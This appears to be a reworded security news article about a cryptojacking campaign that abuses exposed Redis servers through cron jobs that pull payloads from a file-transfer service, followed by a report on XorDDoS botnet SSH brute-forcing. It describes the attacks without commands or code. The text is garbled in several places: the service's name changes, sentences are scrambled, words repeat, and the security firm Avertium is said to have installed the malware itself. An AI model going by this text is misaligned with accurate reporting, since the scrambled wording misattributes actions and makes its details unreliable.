Improperly configured Redis database servers are targeted in a new cryptojacking campaign that leverages legitimate open source command-line file transfer services to carry out attacks.
“What underpinned this campaign was the use of forwarding[.]sh,” Cado Security said in a report shared with The Hacker News.[.]com)”.
A cloud cybersecurity company said the following about command line interactivity related to transfers:[.]sh is an ideal tool for hosting and delivering malicious payloads.
The attack chain begins by targeting an insecure Redis deployment, followed by registering a cron job that, when parsed by the scheduler, leads to arbitrary code execution.This job is designed to retrieve hosted payloads on transfer[.]sh.
It is worth noting that similar attack mechanisms are used in cryptojacking operations by other threat actors such as TeamTNT and WatchDog.
The payload is a script that paves the way for the XMRig cryptocurrency miner, but to free up memory, terminate competing miners, and install a network scanner utility called pnscan to find vulnerable Redis servers and spread the infection. not before performing the preparation steps for
“While the campaign clearly aims to hijack system resources for cryptocurrency mining, infection with this malware may have unintended consequences,” the company said. “Reckless configuration of the Linux memory management system can lead to data corruption and loss of system availability.”
This development makes it the latest threat to attack Redis servers, following Redigo and HeadCrab in recent months.
The findings also indicate that Avertium has brute-forced a new series of XorDdos botnet malware to compromised servers with the aim of launching distributed denial-of-service (DDoS) attacks against targets located in China. It was also brought when revealing the attack.America
The cybersecurity firm said it observed 1.2 million unauthorized SSH connection attempts across 18 honeypots between October 6, 2022 and December 7, 2022. This activity is attributed to a threat actor based in China.
42% of these attempts originated from 49 IP addresses assigned to the ChinaNet Jiangsu Province Network, and the rest originated from 8,000 IP addresses scattered around the world.
“Once the scan identified open ports, we found that a list of approximately 17,000 passwords could be used to brute force the ‘root’ account,” Avertium said. said. “After a successful brute force attack, an XorDDoS bot was installed.”
